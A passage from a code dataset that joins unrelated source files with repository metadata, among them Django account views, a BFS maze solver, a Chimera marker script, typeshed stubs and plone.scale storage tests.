c.add_file_to_category(ucsd_dy_2018.name, ucsd_dy_2018.path, ucsd_dy_2018.xSec, c.dy_label, False)
c.add_category(c.top_label, False)
c.add_file_to_category(ucsd_top_2016.name, ucsd_top_2016.path, ucsd_top_2016.xSec, c.top_label, False)
c.add_file_to_category(ucsd_top_2017.name, ucsd_top_2017.path, ucsd_top_2017.xSec, c.top_label, False)
c.add_file_to_category(ucsd_top_2018.name, ucsd_top_2018.path, ucsd_top_2018.xSec, c.top_label, False)
##########################################################
### ------ Raffaele's variables ------ ###
c.add_variable("hmmpt")
c.add_variable("hmmrap")
c.add_variable("hmmthetacs")
c.add_variable("hmmphics")
c.add_variable("met")
c.add_variable("m1ptOverMass")
c.add_variable("m2ptOverMass")
c.add_variable('m1eta')
c.add_variable('m2eta')
c.add_variable("njets")
c.add_variable("nbjets")
c.add_variable("zepen")
c.add_variable("j1pt")
c.add_variable("j2pt")
c.add_variable("j1eta")
c.add_variable("mjj")
c.add_variable("detajj")
c.add_variable("dphijj")
###############################################
c.add_spectator('hmass')
c.add_spectator('hmerr')
c.add_spectator('weight')
c.weigh_by_event(True)
c.add_package("Keras")
c.add_method("model_resweights") # Dropout 0.2
c.train_methods()
print "Training is done: "
print comment
print "Output saved to:"
print c.outPath
| [
"kondratyev.d.95@gmail.com"
] | kondratyev.d.95@gmail.com |
df5831a71a391f87980328438fe5f86926e0ab15 | 878eecba2d3c6be9df9df0e3d1efb305eb2d7bf5 | /manage.py | 8fe753e6b0606bce8e97835f42364119c428cc9e | [] | no_license | tarunkarmakardev/ModernTools-landing-page | dfa7e3beb162a774495d3483754861ba656a5d50 | ddc811fcb6dcf63ec81d065da2a4e041b94868c0 | refs/heads/master | 2023-01-27T16:02:24.272707 | 2020-12-16T05:18:18 | 2020-12-16T05:18:18 | 321,691,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'moderntools_proj.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Give a hint about the usual causes (missing install / inactive venv).
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
| [
"tarun.karmakar.dev@gmail.com"
] | tarun.karmakar.dev@gmail.com |
34a44453130cb2d95cedae4a983ee5c515790b86 | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/positiveInteger/Schema+Instance/NISTXML-SV-IV-list-positiveInteger-minLength-1-2.py | 715b946fa5159fb0b19af0b0861cf6fa438d9072 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 527 | py | from output.models.nist_data.list_pkg.positive_integer.schema_instance.nistschema_sv_iv_list_positive_integer_min_length_1_xsd.nistschema_sv_iv_list_positive_integer_min_length_1 import NistschemaSvIvListPositiveIntegerMinLength1
# Auto-generated xsdata/W3C conformance instance: a positiveInteger list
# value satisfying the schema's minLength facet.
obj = NistschemaSvIvListPositiveIntegerMinLength1(
    value=[
        955456363348331457,
        957542655657275468,
        957263866322362775,
        921363534435668136,
        976427824647526163,
        941574587237452877,
        976854472611424354,
        956756856825653725,
    ]
)
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
1c9a374e93179c7fbd847ad7da7bc482836d3182 | 08e2ed7fb3a3080c8cdc46cf7e4cbb2a6e60f90a | /src/game_object/components/glow_component.py | c9dcce079c5157b55879ec2957c6c94e19314bc1 | [] | no_license | thydungeonsean/_rainbowmancer | 1630b60983719dde77cd1dea267dd15dde855c38 | cebaf66f5c69f60f8b6c38492f19b8f1e32f73fe | refs/heads/master | 2021-04-28T07:35:06.183408 | 2018-03-19T19:55:47 | 2018-03-19T19:55:47 | 122,226,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,819 | py | from game_object_component import GameObjectComponent
from src.enum.hues import *
class GlowComponent(GameObjectComponent):
CYCLE = 24
HALF_CYCLE = CYCLE / 2
def __init__(self, owner, color):
GameObjectComponent.__init__(self, owner)
self.color_component = color
self.pol = 1
self.tick = 0
def run(self):
self.tick += 1
if self.tick >= GlowComponent.CYCLE:
self.tick = 0
self.pol = 1
elif self.tick == GlowComponent.HALF_CYCLE:
self.pol = -1
if self.is_boosted or self.is_vulnerable or self.owner.critical:
self.color_component.request_update()
@property
def color_map(self):
return self.owner.level_map.color_map
@property
def is_boosted(self):
return self.matches_tile_color()
@property
def is_vulnerable(self):
return self.is_opposed_to_tile_color()
@property
def pos(self):
return self.owner.coord.int_position
def matches_tile_color(self):
if self.color_component.hue_id != WHITE_HUE:
return self.color_map.get_tile(self.pos) == self.color_component.hue_id
else:
return False
def is_opposed_to_tile_color(self):
tile_hue = self.color_map.get_tile(self.pos)
object_hue = self.color_component.hue_id
return tile_hue in opposed_hues[object_hue]
def get_critical_flash(self):
if self.color_component.is_generated:
bot = LT_BLACK
top = hue_table[self.color_component.hue_id][max_str]
elif self.color_map.get_tile(self.pos) not in {WHITE_HUE, DARK_HUE}:
bot = LT_BLACK
top = hue_table[self.color_map.get_tile(self.pos)][max_str]
else:
bot = PURE_BLACK
top = GREY_3
return self.interpolate_colors(bot, top, self.get_progress_percentage())
def get_boost_flash(self):
if self.color_component.hue_id in strong_colors:
bot = hue_table[self.color_component.hue_id][max_str]
else:
bot = hue_table[self.color_component.hue_id][3]
top = WHITE
return self.interpolate_colors(bot, top, self.get_progress_percentage())
def get_progress_percentage(self):
if self.pol == 1:
return float(self.tick) / GlowComponent.HALF_CYCLE
else:
diff = self.tick - GlowComponent.HALF_CYCLE
mod = GlowComponent.HALF_CYCLE - diff
return float(mod) / GlowComponent.HALF_CYCLE
def interpolate_colors(self, (br, bg, bb), (tr, tg, tb), percent):
diff_r = int((tr - br) * percent)
diff_g = int((tg - bg) * percent)
diff_b = int((tb - bb) * percent)
return diff_r + br, diff_g + bg, diff_b + bb
| [
"marzecsean@gmail.com"
] | marzecsean@gmail.com |
42daabc1053796acc91a604a7c3bee3508786c64 | 15302e92957f4824aa37b9ae524f36ca99f74b2e | /accounts/views.py | 7db5acd621b1455666a8b8c2ea6a045899d6faab | [] | no_license | extremesystems/Shakal-NG | 4bc76893d1fd486681b6364d4bb306b02e348ce4 | 40b4f5e70feb3f0f5ef4432b273eb09387232d3d | refs/heads/master | 2020-12-25T10:36:34.227509 | 2013-09-22T12:52:34 | 2013-09-22T12:52:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,262 | py | # -*- coding: utf-8 -*-
from datetime import datetime
from time import mktime
from auth_remember import remember_user
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import login_required
from django.contrib.auth.signals import user_logged_in
from django.contrib.auth.views import login as login_view
from django.contrib.sites.models import get_current_site
from django.core import signing
from django.core.mail import send_mail
from django.core.urlresolvers import reverse, reverse_lazy
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.template.response import TemplateResponse
from django.utils import timezone
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _, ugettext
from django.views.generic import RedirectView, UpdateView
from forms import ProfileEditForm, EmailChangeForm
def login(*args, **kwargs):
    """Thin wrapper around ``django.contrib.auth.views.login``.

    Kept so URLconfs can import the login view from this module; all
    arguments are forwarded unchanged.
    """
    return login_view(*args, **kwargs)
def profile(request, pk):
    """Render the public profile page for the user with primary key ``pk``.

    Builds a tuple of ``{'name': ..., 'value': ...}`` rows for the
    template.  The e-mail row is appended only when the user opted in
    (``display_mail``), with ``@`` and ``.`` replaced by translated words
    to hinder address harvesters.
    """
    user = get_object_or_404(get_user_model(), pk = pk)
    user_table = (
        {'name': _('user name'), 'value': user.username, 'class': 'nickname'},
        {'name': _('full name'), 'value': user.first_name + ' ' + user.last_name, 'class': 'fn'},
        {'name': _('signature'), 'value': mark_safe(user.signature), 'class': ''},
        {'name': _('linux distribution'), 'value': user.distribution, 'class': 'note'},
        {'name': _('year of birth'), 'value': user.year},
    )
    # A lone space means both first and last name were empty - blank the row.
    if user_table[1]['value'] == ' ':
        user_table[1]['value'] = ''
    if user.display_mail:
        # Obfuscate the address before showing it publicly.
        email = user.email.replace('@', ' ' + ugettext('ROLLMOP') + ' ').replace('.', ' ' + ugettext('DOT') + ' ')
        user_table = user_table + ({'name': _('e-mail'), 'value': email}, )
    context = {
        'user_table': user_table,
        'user_profile': user,
        'is_my_profile': request.user == user,
    }
    return TemplateResponse(request, "registration/profile.html", RequestContext(request, context))
@login_required
def my_profile(request):
    """Render the profile page of the currently logged-in user."""
    return profile(request, request.user.pk)
@login_required
def email_change(request):
    """Let the logged-in user request an e-mail address change.

    GET shows the form pre-filled with the current address.  A valid POST
    sends a signed confirmation link to the *new* address; the change
    only takes effect once that link is visited
    (see ``email_change_activate``).
    """
    if request.method == 'GET':
        form = EmailChangeForm(initial = {'email': request.user.email})
    else:
        form = EmailChangeForm(request.POST)
        if form.is_valid():
            if form.cleaned_data['email'] == request.user.email:
                # Nothing to change - go straight back to the profile.
                return HttpResponseRedirect(reverse('auth_my_profile'))
            else:
                # Sign "<user pk>.<unix timestamp>.<new address>" so the
                # activation view can later verify the request.
                signer = signing.Signer()
                email = form.cleaned_data['email']
                signed = signer.sign(str(request.user.pk) + '.' + str(int(mktime(timezone.now().timetuple()))) + '.' + email)
                context_data = {
                    'email': signed,
                    'site': get_current_site(request),
                    'activate_link': request.build_absolute_uri(reverse('auth_email_change_activate', args = (signed,))),
                }
                context = RequestContext(request, context_data)
                # Subject must be a single line for send_mail.
                email_subject = render_to_string("registration/email_change_subject.txt", context).rstrip("\n")
                email_body = render_to_string("registration/email_change.txt", context)
                send_mail(email_subject, email_body, settings.DEFAULT_FROM_EMAIL, [email])
                return HttpResponseRedirect(reverse('auth_email_change_done'))
    return TemplateResponse(request, "registration/email_change_form.html", {'form': form})
@login_required
def email_change_done(request):
    """Confirmation page shown after the change e-mail has been sent."""
    return TemplateResponse(request, "registration/email_change_done.html")
@login_required
def email_change_activate(request, email):
    """Apply an e-mail change from the signed token in the URL.

    The token carries "<user pk>.<timestamp>.<new address>".  The link is
    rejected when the signature is invalid, it belongs to another user,
    it is older than 14 days, or the address is already taken; only
    ``UserInputError`` messages are surfaced to the template.
    """
    class UserInputError(ValueError):
        # Raised for problems whose message may be shown to the user.
        pass
    context = {
        'validlink': True,
    }
    try:
        signer = signing.Signer()
        email_data = signer.unsign(email)
        # The address itself may contain dots, so split at most twice.
        user_id, timestamp, email = email_data.split('.', 2)
        user = get_user_model().objects.get(pk = int(user_id))
        if user != request.user:
            raise ValueError
        time = timezone.make_aware(datetime.utcfromtimestamp(int(timestamp)), timezone = timezone.utc)
        if ((timezone.now() - time).days) > 14:
            raise UserInputError(_("Link expired."))
        if get_user_model().objects.filter(email = email).exclude(pk = user.pk).count() > 0:
            raise UserInputError(_("E-mail address is already in use."))
        user.email = email
        user.save()
    except UserInputError as e:
        context['validlink'] = False
        context['error_message'] = e.message
    except (signing.BadSignature, ValueError, get_user_model().DoesNotExist) as e:
        # Tampered token, foreign user, or unknown user: fail silently.
        context['validlink'] = False
    return TemplateResponse(request, "registration/email_change_complete.html", context)
@login_required
def my_profile_edit(request):
    """Edit form for the currently logged-in user's own profile."""
    return profile_edit(request, request.user.pk)
def profile_edit(request, pk):
    """Render the edit form for the user with primary key ``pk``.

    Delegates to ``ProfileEditView``; the 404 check happens here so the
    class-based view always receives a valid pk.
    """
    user = get_object_or_404(get_user_model(), pk = pk)
    return ProfileEditView.as_view()(request, pk = user.pk)
class ProfileEditView(UpdateView):
    """Form view for editing a user's profile."""
    form_class = ProfileEditForm
    model = get_user_model()
    template_name = 'registration/profile_change.html'
    def get_success_url(self):
        # After saving, return to the (read-only) profile page.
        return reverse('auth_my_profile')
# Entry point that simply bounces to the logged-in user's profile page.
user_zone = login_required(RedirectView.as_view(url = reverse_lazy('auth_my_profile')))
def remember_user_handle(sender, request, user, **kwargs):
    """On login, set a persistent session when "remember me" was checked."""
    if user.is_authenticated() and request.POST.get('remember_me', False):
        remember_user(request, user)
user_logged_in.connect(remember_user_handle, sender = get_user_model())
| [
"miroslav.bendik@gmail.com"
] | miroslav.bendik@gmail.com |
8c52eb808bb173ab14c7a1d035b74b057d83996a | 0e0f90024d09ff67bcc1b6608a52b0f9ea11fcc4 | /1st_100_questions/LargestperimeterTriangle.py | bcd386f5321df704e8c85a7f5374c0c33b6f7ca0 | [] | no_license | newbieeashish/LeetCode_Algo | ffd7122018ad38b890bf96ceb40c75506fb3d3e1 | 3afaaec3c54787e4646d1472d3f6e7188fb6aec5 | refs/heads/master | 2022-12-14T22:38:04.433700 | 2020-09-17T16:42:03 | 2020-09-17T16:42:03 | 288,243,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | '''
Given an array A of positive lengths, return the largest perimeter of a
triangle with non-zero area, formed from 3 of these lengths.
If it is impossible to form any triangle of non-zero area, return 0.
Example 1:
Input: [2,1,2]
Output: 5
Example 2:
Input: [1,2,1]
Output: 0
Example 3:
Input: [3,2,3,4]
Output: 10
Example 4:
Input: [3,6,2,3]
Output: 8
'''
def LargestPerimeterTriangle(A):
    """Return the largest perimeter of a non-degenerate triangle built
    from three of the lengths in ``A``, or 0 if none exists.

    Sorts ``A`` in place (descending).  After sorting, the first run of
    three consecutive values satisfying the triangle inequality gives
    the maximum possible perimeter.
    """
    A.sort(reverse=True)
    for a, b, c in zip(A, A[1:], A[2:]):
        # a >= b >= c, so the only inequality that can fail is a < b + c.
        if a < b + c:
            return a + b + c
    return 0
print(LargestPerimeterTriangle([3,6,2,3])) | [
"noreply@github.com"
] | newbieeashish.noreply@github.com |
04bf71b28a823eca83b966aba030e7c3bbab0727 | 14373275670c1f3065ce9ae195df142146e2c1a4 | /stubs/influxdb-client/influxdb_client/domain/measurement_schema_list.pyi | c040b8274502414bdf54a289a3329e40f92554ca | [
"Apache-2.0",
"MIT"
] | permissive | sobolevn/typeshed | eb7af17c06a9722f23c337e6b9a4726223155d58 | d63a82640390a9c130e0fe7d409e8b0b836b7c31 | refs/heads/master | 2023-08-04T05:59:29.447015 | 2023-06-14T21:27:53 | 2023-06-14T21:27:53 | 216,265,622 | 2 | 0 | Apache-2.0 | 2022-02-08T10:40:53 | 2019-10-19T20:21:25 | Python | UTF-8 | Python | false | false | 508 | pyi | from _typeshed import Incomplete
class MeasurementSchemaList:
    """Type stub for influxdb_client's generated ``MeasurementSchemaList`` model."""
    openapi_types: Incomplete
    attribute_map: Incomplete
    discriminator: Incomplete
    def __init__(self, measurement_schemas: Incomplete | None = None) -> None: ...
    @property
    def measurement_schemas(self): ...
    @measurement_schemas.setter
    def measurement_schemas(self, measurement_schemas) -> None: ...
    def to_dict(self): ...
    def to_str(self): ...
    def __eq__(self, other): ...
    def __ne__(self, other): ...
| [
"noreply@github.com"
] | sobolevn.noreply@github.com |
e4c391d3b6e866523a631ef0612b77f9ee83c8f0 | eefff1251b2807a2a96748f9369336d5cff5622f | /website/apps/cms/plugins/flash/cms_plugins.py | 3a7842ed1e8bb1293ab68e7fb6c85860be311a89 | [] | no_license | tximikel/pinax-satchmo-buildout | 8d669280c5da47315bbfb96d2797a8c7a1d682b5 | 1e2b8d77fdfc538bd3cb483aa0e549af4e952aa1 | refs/heads/master | 2021-01-16T01:27:09.320052 | 2009-09-15T23:36:33 | 2009-09-15T23:36:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | from cms.plugin_pool import plugin_pool
from cms.plugin_base import CMSPluginBase
from django.utils.translation import ugettext_lazy as _
from models import Flash
from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from cms.plugins.flash.forms import FlashForm
class FlashPlugin(CMSPluginBase):
    """django CMS plugin that renders an embedded Flash object."""
    model = Flash
    name = _("Flash")
    form = FlashForm
    render_template = "cms/plugins/flash.html"
    def render(self, context, instance, placeholder):
        # Expose the plugin instance to the template as ``object``.
        context.update({
            'object': instance,
        })
        return context
plugin_pool.register_plugin(FlashPlugin)
"harley@harley-desktop.(none)"
] | harley@harley-desktop.(none) |
5dfadd0ce45da68215a76c87b5ea34b22ff7c046 | 449da7b08bb82654028967aa0fa8efce8b2b10d2 | /adapter/sites/open/blueking/tests/test_utils.py | cb3cafb4a70dfb7eafbd0a1c3739411cac218684 | [] | no_license | sdgdsffdsfff/bk-dop | f1ae15f858f6236405e50e9453554026d2bcfd21 | 97cfac2ba94d67980d837f0b541caae70b68a595 | refs/heads/master | 2023-08-31T22:24:30.616269 | 2021-10-19T17:56:36 | 2021-10-19T17:56:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | # -*- coding: utf-8 -*-
from django.test import TestCase
from blueking.component.utils import get_signature
class TestUtils(TestCase):
    """Tests for ``blueking.component.utils.get_signature``."""
    def test_get_signature(self):
        # GET request: signature is computed over method, path and params.
        params = {
            'method': 'GET',
            'path': '/blueking/component/',
            'app_secret': 'test',
            'params': {'p1': 1, 'p2': 'abc'},
        }
        signature = get_signature(**params)
        self.assertEqual(signature, 'S73XVZx3HvPRcak1z3k7jUkA7FM=')
        # POST request with a body instead of query params.
        params = {
            'method': 'POST',
            'path': '/blueking/component/',
            'app_secret': 'test',
            'data': {'p1': 1, 'p2': 'abc'},
        }
        # python3 could sort the dict
        signature = get_signature(**params)
        self.assertIn(signature, ['qTzporCDYXqaWKuk/MNUXPT3A5U=', 'PnmqLk/8PVpsLHDFkolCQoi5lmg='])
| [
"1297650644@qq.com"
] | 1297650644@qq.com |
14ef745c146208d2df666127b33858c6be7b7e28 | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog_tags/initial_9549.py | 45f1b9acca999586745f601672e163547da344a4 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,328 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog1_Anch" not in marker_sets:
s=new_marker_set('Cog1_Anch')
marker_sets["Cog1_Anch"]=s
s= marker_sets["Cog1_Anch"]
mark=s.place_marker((126, 38, 103), (0, 0, 1), 21.9005)
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((591, 364, 713), (1, 0.5, 0), 21.9005)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((858, 422, 729), (1, 0.5, 0), 21.9005)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((810, 97, 293), (1, 0.5, 0), 21.9005)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((825, 997, 101), (1, 0.87, 0), 21.9005)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((938, 390, 276), (1, 0.87, 0), 21.9005)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((643, 164, 956), (1, 0.87, 0), 21.9005)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((127, 77, 956), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((289, 389, 770), (0.97, 0.51, 0.75), 21.9005)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((207, 852, 717), (0.97, 0.51, 0.75), 21.9005)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((614, 524, 34), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((8, 47, 666), (0.39, 0.31, 0.14), 21.9005)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((493, 644, 706), (0.39, 0.31, 0.14), 21.9005)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((809, 721, 927), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((652, 818, 12), (0.6, 0.31, 0.64), 21.9005)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((954, 392, 878), (0.6, 0.31, 0.64), 21.9005)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((50, 511, 573), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((120, 516, 982), (0.89, 0.1, 0.1), 21.9005)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((885, 733, 538), (0.89, 0.1, 0.1), 21.9005)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((880, 949, 627), (0.3, 0.69, 0.29), 21.9005)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((838, 343, 909), (0.3, 0.69, 0.29), 21.9005)
# Register any surface sets with Chimera's open models (none are created
# by this particular generated script, so surf_sets is usually empty).
for k in surf_sets.keys():
    chimera.openModels.add([surf_sets[k]])
"batxes@gmail.com"
] | batxes@gmail.com |
9148c4700e17b1eaf522d5d491ca64143dd99ec5 | 4382c60f18aba351a2e7cdab7ce2793c2d27717c | /Algorithm 190821 holefly/maze.py | 12f18e9fb2494b562c1a9664481cda999c37fabd | [] | no_license | vxda7/pycharm | e550b1db4cabe1a0fa03e140f33b028ef08bd4cb | ce29f682a923875b62a8c7c0102790eef11ab156 | refs/heads/master | 2020-07-03T11:27:27.807096 | 2019-11-15T08:50:32 | 2019-11-15T08:50:32 | 201,891,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,261 | py | import sys
sys.stdin = open("sample_input.txt", "r")
def find(scol, srow):
    """BFS from the start cell toward the goal cell (value 3).

    Reads the module-level ``maze`` (N x N grid of digits) and ``N``.
    ``visited`` stores distance-from-start *plus one*, so when a
    neighbour of the current cell is the goal, the number of cells
    passed between start and goal is ``visited[current] - 1``.
    Returns 0 when the goal is unreachable.
    """
    global maze
    global N
    # Neighbour offsets: down/right/up/left pairs.
    dl = [0, 1, 0, -1]
    dr = [1, 0, -1, 0]
    queue = []
    visited = [[0] * N for _ in range(N)]
    queue.append([scol, srow])
    visited[scol][srow] = 1
    while len(queue) != 0:
        n = queue.pop(0)
        for i in range(4):
            ndl = n[0] + dl[i]
            ndr = n[1] + dr[i]
            if ndl >= 0 and ndl < N and ndr >= 0 and ndr < N: # still inside the maze?
                if maze[ndl][ndr] == 3: # reached the goal cell
                    return visited[n[0]][n[1]] - 1
                elif maze[ndl][ndr] != 1 and visited[ndl][ndr] == 0: # not a wall and not yet visited
                    queue.append([ndl, ndr])
                    visited[ndl][ndr] += 1 + visited[n[0]][n[1]]
    return 0
# def bfs(i, j , N):
# global maze
# di = [0, 1, 0, -1]
# dj = [1, 0, -1, 0]
# # 초기화
# q=[] #큐생성
# visited = [[0]*N for _ in range(N)] #visited 생성
# q.append([i, j]) # 시작점 인큐
# visited[i][j] = 1 # 시작점 방문표시
#
# # 탐색
# while len(q) != 0: # 큐가 비어있지 않으면 반복
# n = q.pop(0) # 디큐
# i, j = n[0], n[1]
# if maze[i][j] == 3: # visit()
# print(visited)
# return visited[i][j] - 2
# # i, j에 인접하고 방문하지 않은 칸을 인큐
# for k in range(4):
# ni = i + di[k]
# nj = j + dj[k]
# if ni >= 0 and ni < N and nj >= 0 and nj < N: # 미로를 벗어나지 않고
# if maze[ni][nj] != 1 and visited[ni][nj] == 0: # 벽이아니고, 방문하지 않은 칸이면
# q.append([ni, nj]) # 인큐
# visited[ni][nj] += 1 + visited[i][j] # 방문 표시
#
# return 0
test_case = int(input())
for case in range(1, test_case + 1):
N = int(input())
maze = []
for i in range(N):
get = list(map(int,list(input())))
maze.append(get)
if 2 in get:
scol = i
srow = get.index(2)
result = find(scol, srow)
# result = bfs(scol, srow, N)
print("#{} {}".format(case, result))
| [
"vxda77@gmail.com"
] | vxda77@gmail.com |
a7ef82ec99d2dabda3ce6ccfe98cbfd0a087bfa6 | 61f9553eedc2ec936ea87f06da5b986091e3b8ff | /workspace/buildout-cache/eggs/plone.scale-1.3.2-py2.7.egg/plone/scale/tests/test_storage.py | 21725c874ed3e430c1fe7398bda865efc9f11528 | [] | no_license | gruhter/gso | 47880b055455cc99d63eec72498048c857e7831b | c0eb949f8a06aab6b97329d51a6d046e2fc0a653 | refs/heads/master | 2016-09-01T18:28:05.589620 | 2015-05-14T19:38:18 | 2015-05-14T19:38:18 | 35,579,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,910 | py | from unittest import TestCase
from operator import itemgetter, setitem, delitem
class AnnotationStorageTests(TestCase):
    """Unit tests for ``plone.scale.storage.AnnotationStorage``.

    The ``storage`` property rebuilds the storage on every access with a
    plain dict backend and a fixed ``modified`` timestamp, so each test
    starts from a clean, deterministic state.
    """
    @property
    def storage(self):
        from plone.scale.storage import AnnotationStorage
        storage = AnnotationStorage(None)
        storage.modified = lambda: 42
        storage.storage = {}
        return storage
    def factory(self, **kw):
        # Stand-in scale factory: returns (data, format, (width, height)).
        return 'some data', 'png', (42, 23)
    def testInterface(self):
        from plone.scale.storage import IImageScaleStorage
        storage = self.storage
        self.failUnless(IImageScaleStorage.providedBy(storage))
    def testScaleForNonExistingScaleWithCreation(self):
        storage = self.storage
        scale = storage.scale(factory=self.factory, foo=23, bar=42)
        self.failUnless('uid' in scale)
        self.failUnless('key' in scale)
        self.assertEqual(scale['data'], 'some data')
        self.assertEqual(scale['width'], 42)
        self.assertEqual(scale['height'], 23)
        self.assertEqual(scale['mimetype'], 'image/png')
    def testScaleForNonExistingScaleWithoutCreation(self):
        # Without a factory, a missing scale is not created.
        storage = self.storage
        scale = storage.scale(foo=23, bar=42)
        self.assertEqual(scale, None)
    def testScaleForExistingScale(self):
        # Keyword order must not matter for cache lookups.
        storage = self.storage
        scale1 = storage.scale(factory=self.factory, foo=23, bar=42)
        scale2 = storage.scale(factory=self.factory, bar=42, foo=23)
        self.failUnless(scale1 is scale2)
        self.assertEqual(len(storage), 2)
    def testScaleForSimilarScales(self):
        # Different parameters must produce a different cached scale.
        storage = self.storage
        scale1 = storage.scale(factory=self.factory, foo=23, bar=42)
        scale2 = storage.scale(factory=self.factory, bar=42, foo=23, hurz='!')
        self.failIf(scale1 is scale2)
        self.assertEqual(len(storage), 4)
    def testGetItem(self):
        storage = self.storage
        scale = storage.scale(factory=self.factory, foo=23, bar=42)
        uid = scale['uid']
        scale = storage[uid]
        self.failUnless('uid' in scale)
        self.failUnless('key' in scale)
        self.assertEqual(scale['data'], 'some data')
        self.assertEqual(scale['width'], 42)
        self.assertEqual(scale['height'], 23)
        self.assertEqual(scale['mimetype'], 'image/png')
    def testGetUnknownItem(self):
        storage = self.storage
